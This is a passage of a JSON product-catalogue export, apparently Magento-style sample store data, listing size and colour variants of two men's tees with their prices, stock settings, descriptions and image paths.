",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"426\":{\"sku\":\"MS09-L-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)-L-Blue\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-crew-neck-l-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms09-blue_alt1.jpg,\\/m\\/s\\/ms09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms09-blue_alt1.jpg,\\/m\\/s\\/ms09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Blue\"},\"427\":{\"sku\":\"MS09-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)-L-Red\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-crew-neck-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"428\":{\"sku\":\"MS09-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)-XL-Black\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-crew-neck-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"429\":{\"sku\":\"MS09-XL-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)-XL-Blue\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-crew-neck-xl-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms09-blue_alt1.jpg,\\/m\\/s\\/ms09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms09-blue_alt1.jpg,\\/m\\/s\\/ms09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Blue\"},\"430\":{\"sku\":\"MS09-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)-XL-Red\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"ryker-lumatech-trade-tee-crew-neck-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"431\":{\"sku\":\"MS09\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Ryker LumaTech&trade; Tee (Crew-neck)\",\"description\":\"<p>The crew-neck Ryker LumaTech&trade; Tee hides premium performance technology beneath unassuming looks. The featherweight blend of fabrics wicks away moisture to keep you cool and dry in every phase of your active life.<\\/p>\\n<p>&bull; Royal polyester tee with black accents.<br \\/>&bull; Relaxed fit. <br \\/>&bull; Short-Sleeve. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"32\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tee,material=LumaTech&trade;|Polyester,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=Yes,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MS09-XS-Black,size=XS,color=Black|sku=MS09-XS-Blue,size=XS,color=Blue|sku=MS09-XS-Red,size=XS,color=Red|sku=MS09-S-Black,size=S,color=Black|sku=MS09-S-Blue,size=S,color=Blue|sku=MS09-S-Red,size=S,color=Red|sku=MS09-M-Black,size=M,color=Black|sku=MS09-M-Blue,size=M,color=Blue|sku=MS09-M-Red,size=M,color=Red|sku=MS09-L-Black,size=L,color=Black|sku=MS09-L-Blue,size=L,color=Blue|sku=MS09-L-Red,size=L,color=Red|sku=MS09-XL-Black,size=XL,color=Black|sku=MS09-XL-Blue,size=XL,color=Blue|sku=MS09-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms09-blue_alt1.jpg,\\/m\\/s\\/ms09-blue_back.jpg\",\"image\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms09-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms09-blue_alt1.jpg,\\/m\\/s\\/ms09-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tee\",\"material\":\"LumaTech&trade;|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"Yes\",\"new\":\"No\",\"sale\":\"No\"},\"432\":{\"sku\":\"MS11-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Atomic Endurance Running Tee (V-neck)-XS-Blue\",\"description\":\"<p>Reach your limit and keep on going in the Atomic Endurance Running Tee. Built to help any athlete push past the wall with loads of performance features.<\\/p>\\n<p>&bull; Lime heathered v-neck tee. <br \\/>&bull; Ultra-lightweight.<br \\/>&bull; Moisture-wicking Cocona&reg; fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atomic-endurance-running-tee-v-neck-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms11-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms11-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms11-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/s\\/ms11-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms11-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"433\":{\"sku\":\"MS11-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Atomic Endurance Running Tee (V-neck)-XS-Green\",\"description\":\"<p>Reach your limit and keep on going in the Atomic Endurance Running Tee. Built to help any athlete push past the wall with loads of performance features.<\\/p>\\n<p>&bull; Lime heathered v-neck tee. <br \\/>&bull; Ultra-lightweight.<br \\/>&bull; Moisture-wicking Cocona&reg; fabric.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"atomic-endurance-running-tee-v-neck-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/s\\/ms11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/s\\/ms11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/s\\/ms11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/s\\/ms11-green_back.jpg\",\"image\":\"\\/m\\/s\\/ms11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/s\\/ms11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/s\\/ms11-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"434\":{\"sku\":\"MS11-XS-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tees\",\"product_websites\":\"base\",\"name\":\"Atomic Endurance Running Tee (V-neck)-XS-Yellow\",\"description\":\"<p>Reach your limit and keep on going in the Atomic Endurance Running Tee. Built to help any athlete push past the wall with loads of performance features.<\\/p>\\n<p>&bull; Lime heathered v-neck tee. <br \\/>&bull; Ultra-lightweight.<br 